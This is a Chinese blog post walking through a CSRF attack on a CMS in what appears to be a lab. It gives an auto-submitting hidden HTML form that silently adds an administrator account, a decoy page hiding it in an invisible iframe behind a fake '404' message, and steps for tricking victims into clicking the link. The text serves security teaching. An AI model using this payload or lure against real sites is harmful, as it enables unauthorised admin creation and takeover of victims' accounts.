CSRF攻击实例-CMS

已于 2024-01-23 10:39:41 修改
阅读量364 收藏 6
点赞数 8
分类专栏: # 其他常见漏洞类型 文章标签: csrf 前端 安全
于 2024-01-20 10:50:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/135712201
版权

文章目录

CMS

1.确定攻击目的

添加后台管理员用户
以受害人身份发帖
以受害人身份关注公众号或微博 买粉

2.寻找攻击路径

观察目标网站源代码,确定网站模板
在这里插入图片描述
观察目标功能源代码
在这里插入图片描述

3.确定攻击方式

CET方式提交信息
POST 方式提交表单

4.制作攻击页面并搭建站点

打开kali的服务

service apache2 start
cd /var/www/html
vi csrf.html

制作一个 HTML 文档

<body onload=document.forms[0].submit()>
 <form action="http://192.168.65.128/cms/admin/user.action.php" method="post">
	<input type="hidden" name="act" value="add">
	<input name="username" type="hidden" value="aaa">
	<input name="password" type="hidden" value="bbb">
	<input name="password2" type="hidden" value="bbb">
	<input type="hidden" name="userid" value="0">
 </form>
</body>
模仿html页面,删除无用信息

将文档写入kali

在这里插入图片描述

将链接发给用户,让用户访问

在这里插入图片描述
这种方式创建的效果不是特别好

创建一个新的文件(csrf-null.html)

在这里插入图片描述

制作一个特殊的 HTML 文档

<body>
 <iframe src="csrf.html" style="display: none"></iframe>
 <h1 style="text-align: center;">404</h1>
 <h3 style="text-align: center;">File not found</h3>
</body>

在这里插入图片描述

5.发送 CSRF 链接至受害人,诱骗其点击链接实现攻击目的

诱导用户点开链接

在这里插入图片描述

自动创建用户

在这里插入图片描述

摆烂鱼
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF-Protector-PHP:CSRF保护器库
05-10
" owasp/csrf-protector-php " : " dev-master " } } 然后打开终端(或命令提示符),移至项目目录并运行 composer install # # Or alternatively php composer.phar install 这会将CSRFP添加到您的项目目录中...
Bolt:CSRF扫描仪-源码
05-25
比较中此阶段专注于重播攻击场景的检测,因此检查令牌是否已发行多次。 它还计算所有令牌之间的平均,以查看它们是否相似。 还将令牌与250多种哈希模式的数据库进行比较。观察在此阶段,对单个网页同时发出100个请求...
CSRF攻击实例-CMS,膜拜大牛
m0_60635609的博客
04-05 893
a、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~POST 方式提交表单。
CSRF攻击实例-CMS,2024年最新成功入职腾讯
2401_83946826的博客
04-15 407
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!浅尝辄止,不再深入研究,那么很难做到真正的技术提升。对于从来没有接触过网络安全的同学,我们帮你准备了详细的。,大家跟着这个大的方向学习准没问题。
CSRF攻击实例-CMS(1),太现实了
m0_61072747的博客
04-07 269
模仿html页面,删除无用信息。
CSRF攻击实例-CMS(1),华为网络安全面试真题解析
m0_60635609的博客
04-05 530
3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**
CSRF攻击实例-CMS,2024年最新这些新技术你们都知道吗
2401_84164503的博客
04-09 478
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CSRF攻击实例-CMS(1),2024年最新算法+分布式+微服务
m0_60567796的博客
04-17 275
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这种方式创建的效果不是特别好。因篇幅有限,仅展示部分资料。POST 方式提交表单。
CSRF攻击实例-CMS,2024年最新2024网络安全开发社招面试总结+解答分享
m0_60567881的博客
04-17 404
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-a0UN3qvI-1713310597053)]p204888 (备注网络安全)**以受害人身份关注公众号或微博 买粉。观察目标网站源代码,确定网站模板。这种方式创建的效果不是特别好。还有大家最喜欢的黑客技术。POST 方式提交表单。
CSRF攻击实例-CMS,2024年最新这里有份超全网络安全体系化进阶学习图谱
2401_83974370的博客
04-13 422
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
CSRF跨站请求伪造攻击(附自动化工具实战某CMS
m0_51468027的博客
02-02 2837
一、CSRF介绍   CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像xss漏洞,但是它与xss漏洞非常不同。xss利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。与xss攻击相比,csrf攻击往往不大流行,也难以防范,所以认为比xss漏洞更具危险性 二、CSRF漏洞原理   CS
CSrf攻击-苏醒的巨人
09-16
CSrf攻击-苏醒的巨人
CSRF:ring-csrf示例
01-28
CSRF:ring-csrf示例
安全性测试--CSRF攻击
02-26
你这可以这么理解CSRF攻击攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于**商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及...
CSRF 攻击实验:无防御措施的 CSRF 漏洞
Flag少侠的博客
05-14 1463
CSRF(Cross-Site Request Forgery),也称为XSRF,是一种安全漏洞,攻击者通过欺骗用户在受信任网站上执行非自愿的操作,以实现未经授权的请求。CSRF攻击利用了网站对用户提交的请求缺乏充分验证和防范的弱点。攻击者通常通过在受信任网站上构造恶意的请求链接或提交表单,然后诱使用户点击该链接或访问包含恶意表单的页面。当用户执行了这些操作时,网站会自动发送请求,包含用户的身份验证信息,而用户并不知情。在这个示例中,攻击者可能在自己的网站上构造一个页面,包含上述代码。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
最新发布
小易不止于搬砖的博客
05-17 670
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1108
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 508
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
CSRF 攻击 攻击原理
06-11
CSRF(Cross-Site Request Forgery)攻击又称为跨站请求伪造或者被动式攻击攻击者通过伪造合法用户的请求发送到Web应用程序,从而达到不正当的目的。攻击者通常需要诱导用户执行某些操作(如点击链接、访问网站等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值